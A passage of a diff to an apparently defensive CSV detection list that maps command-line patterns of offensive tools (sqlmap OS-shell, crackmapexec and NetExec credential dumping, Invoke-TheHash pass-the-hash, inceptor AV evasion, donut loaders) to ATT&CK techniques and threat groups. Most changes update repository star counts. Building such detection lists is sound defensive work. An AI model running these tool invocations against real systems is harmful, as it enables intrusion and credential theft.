tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --tor-port*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --tor-type*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --tor-port*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --tor-type*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --transformer donut*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --transformer Loader*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --transformer pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --transformer sRDI*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer donut*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer Loader*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer sRDI*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* TSCHRPCAttack*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "* --type asreproast*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "* --type search-spn*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" -"* -type user -search * -DomainController * -Credential * -list yes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -type user -search * -DomainController * -Credential * -list yes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" -"* -u * --local-auth*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p * --lusers*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p * -M handlekatz*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -u * -p * -M nanodump*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -u * -p * -M ntdsutil*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -u * -p * --sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p * --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p *--pass-pol*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u *http* --dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* -u *http* --os-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* -u FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -u http* -f *.dll * -p *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -u * --local-auth*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --lusers*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * -M handlekatz*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M nanodump*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M ntdsutil*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * --sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p *--pass-pol*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u *http* --dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u *http* --os-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -u http* -f *.dll * -p *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* -U msf -P msf *","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"* -u wordlist * wordlist_uniq_sorted*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"* -u wordlist * wordlist_uniq_sorted*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "* uberfile.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --unconstrained-users*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - 